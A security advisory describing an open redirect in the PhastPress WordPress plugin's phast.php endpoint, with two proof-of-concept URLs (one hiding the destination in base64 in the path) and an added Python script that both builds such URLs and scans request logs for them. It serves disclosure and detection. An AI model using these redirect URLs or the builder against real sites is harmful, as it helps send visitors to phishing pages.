The plugin ships a phast.php endpoint that takes its destination from the src parameter, and that destination is not restricted to the site itself: an attacker crafts a request to a page running the plugin and the response redirects the visitor to a page of the attacker's choosing (an open redirect). A support topic opened by another user a year earlier (https://wordpress.org/support/topic/phast-php-used-for-remote-fetch/) states that the PHP involved in the request only fetches from whitelisted pages; that restriction covers the server-side fetch, not where the visitor is sent, so the victim can still be redirected to any domain.
Proof of concept. Both request shapes below redirect the visitor to https://wpscan.com. The first passes the parameters in the query string:

https://example.com/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fwpscan.com

The second carries them base64-encoded in the path, which keeps the destination out of the visible query string:

https://example.com/wp-content/plugins/phastpress/phast.php/c2VydmljZT1pbWFnZXMmc3JjPWh0dHBzJTNBJTJGJTJGd3BzY2FuLmNvbSZjYWNoZU1hcmtlcj0mdG9rZW49.q.png

Here c2VydmljZT1pbWFnZXMmc3JjPWh0dHBzJTNBJTJGJTJGd3BzY2FuLmNvbSZjYWNoZU1hcmtlcj0mdG9rZW49 is the base64 encoding of service=images&src=https%3A%2F%2Fwpscan.com&cacheMarker=&token=
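The following script is an added example, not code from the WPScan advisory or from the PhastPress plugin. It reproduces both request shapes shown above from a site and a target URL, and, in the other direction, decodes either shape back to its parameters so that web-server request lines can be checked for an src that points off-site. Two things are assumptions rather than facts from the advisory: that the path form uses standard (not URL-safe) base64, which the sample token is consistent with, and the sample request lines, which are constructed for the demo.

```python
"""Reproduce and detect the two phast.php request shapes from the advisory.

Added example; not code from the advisory or from the PhastPress plugin.
Assumptions: the path form base64-encodes the query string with the standard
alphabet (the sample token in the advisory is consistent with this), and the
request lines in SAMPLE_LINES are constructed, not captured traffic.
"""
import base64
import binascii
from urllib.parse import parse_qs, quote, urlsplit

PHAST_PATH = "/wp-content/plugins/phastpress/phast.php"
SITE = "https://example.com"  # the WordPress site running the plugin (assumed)


def encode_params(params: dict) -> str:
    """Percent-encode every value fully (':' and '/' included), as in the PoC URLs."""
    return "&".join(f"{k}={quote(v, safe='')}" for k, v in params.items())


def build_query_url(site: str, target: str, service: str = "scripts") -> str:
    """Query-string shape: phast.php?service=scripts&src=<encoded target>."""
    return f"{site.rstrip('/')}{PHAST_PATH}?{encode_params({'service': service, 'src': target})}"


def build_path_url(site: str, target: str, service: str = "images") -> str:
    """Path shape: phast.php/<base64(query string)>.q.png, destination hidden in the path."""
    raw = encode_params({"service": service, "src": target, "cacheMarker": "", "token": ""})
    token = base64.b64encode(raw.encode()).decode()
    return f"{site.rstrip('/')}{PHAST_PATH}/{token}.q.png"


def extract_params(url: str) -> dict:
    """Return the phast.php parameters for either shape; {} if the URL is neither."""
    parts = urlsplit(url)
    marker = PHAST_PATH + "/"
    if parts.path.endswith(PHAST_PATH):
        raw = parts.query
    elif marker in parts.path:
        segment = parts.path.split(marker, 1)[1].split(".", 1)[0]
        segment += "=" * (-len(segment) % 4)  # tolerate stripped base64 padding
        try:
            raw = base64.b64decode(segment, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            return {}
    else:
        return {}
    return {k: v[0] for k, v in parse_qs(raw, keep_blank_values=True).items()}


def is_offsite_src(url: str, site: str) -> bool:
    """True when src names a host other than the site itself, i.e. the redirect primitive.

    Relative paths have no host and are not flagged; protocol-relative values
    such as //evil.example do carry a host and are.
    """
    src = extract_params(url).get("src", "")
    src_host = urlsplit(src).hostname
    return src_host is not None and src_host.lower() != urlsplit(site).hostname.lower()


def scan_request_lines(site: str, lines: list) -> list:
    """From 'METHOD /path HTTP/x' request lines, return (path, src) for off-site src values."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 2:
            continue
        url = site.rstrip("/") + fields[1]
        if is_offsite_src(url, site):
            hits.append((fields[1], extract_params(url)["src"]))
    return hits


def as_request_line(url: str) -> str:
    """Turn an absolute URL into the request line a web server would log for it."""
    parts = urlsplit(url)
    return f"GET {parts.path}{'?' + parts.query if parts.query else ''} HTTP/1.1"


# Constructed sample: a benign same-host request followed by the two PoC shapes.
SAMPLE_LINES = [
    as_request_line(build_query_url(SITE, "https://example.com/app.js")),
    as_request_line(build_query_url(SITE, "https://wpscan.com")),
    as_request_line(build_path_url(SITE, "https://wpscan.com")),
]

if __name__ == "__main__":
    for path, src in scan_request_lines(SITE, SAMPLE_LINES):
        print(f"off-site src {src!r} in {path}")
```

The decoder is the useful half for defenders: a filter that only inspects the query string misses the path form entirely, so any rule for this endpoint has to decode the base64 segment before looking at src.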
CPE

Name | Operator | Version
---|---|---
phastpress | lt | 1.111